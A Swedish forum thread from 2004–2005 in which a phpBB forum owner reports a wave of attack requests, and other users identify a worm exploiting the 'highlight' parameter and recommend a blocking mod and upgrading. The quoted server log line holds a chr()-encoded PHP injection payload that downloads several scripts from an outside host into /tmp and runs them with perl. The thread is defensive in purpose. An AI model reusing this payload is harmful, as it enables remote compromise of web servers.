Sida 1 av 1

Hackingförsök

Postat: 2004-12-30 10:49
av elis
Har ett forum som utsatts för hackingförsök. I serverloggen hittar jag ca 15000 rader som liknar denna:

Kod: Markera allt

66.230.141.34 - - [29/Dec/2004:21:47:31 +0100] "GET /viewtopic.php?t=25&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 HTTP/1.0" 200 24136 "-" "lwp-trivial/1.35"
Det har inte lyckats förstöra något, men förbrukat ganska mycket onödig bandvidd. Någon som vet vad de var ute efter och vad man kan göra för att mota Olle i grind?

Postat: 2004-12-30 12:07
av Holger
Det är den nya masken som via Google försöker att hacka ditt forum via "highlight"-exploiten.

Det finns en lösning för detta:
http://www.community.cback.de/downloads ... d=46&cat=1

Det är en modd som loggar alla hack-försök och dessutom blockerar dessa försök.

Postat: 2004-12-30 15:16
av elis
Tack! Problemet är att jag inte lyckats installer särskilt många moddar sedan jag uppdaterade till 2.0.11. Det är väl bara att sätta sig med BBEdit igen...

Postat: 2005-01-01 19:06
av Kail
Som sagt, version 2.0.11 ær skyddad från denna typ av attack.

/Jakob som ær i Norge nu

Postat: 2005-01-03 17:19
av elis
Kail skrev:Som sagt, version 2.0.11 ær skyddad från denna typ av attack.
Det är bara delvis sant. ;-) 2.0.11 har inte den säkerhetslucka som gör att man kan hacka forumet, men attacker kan komma ändå! 15000 hackeranrop på några dagar ger en slö server under tiden och onödiga kostnader för bandvidd, men visst är jag glad att jag uppdaterade så att de inte förstörde något...

Postat: 2005-01-03 22:57
av elis
Hittade denna lösningen på problemet: http://www.lindqvist.com/index.php?ID=1798

Koden verkar endast behövas i viewtopic.php, hittills har LWP inte laddat någon annan sida.

Såg idag att någon varit och surfat i db-katalogen. Jag vet inte vilken skada det kan göra, men det kan nog vara en god idé att låsa den.

Postat: 2005-01-06 12:38
av Narog
Har inte 2.0.10 också detta skydd? För jag har fortfarande ett forum som är 2.0.10...?

Postat: 2005-01-06 12:50
av Holger
Nej, uppdatera snarast. :wink: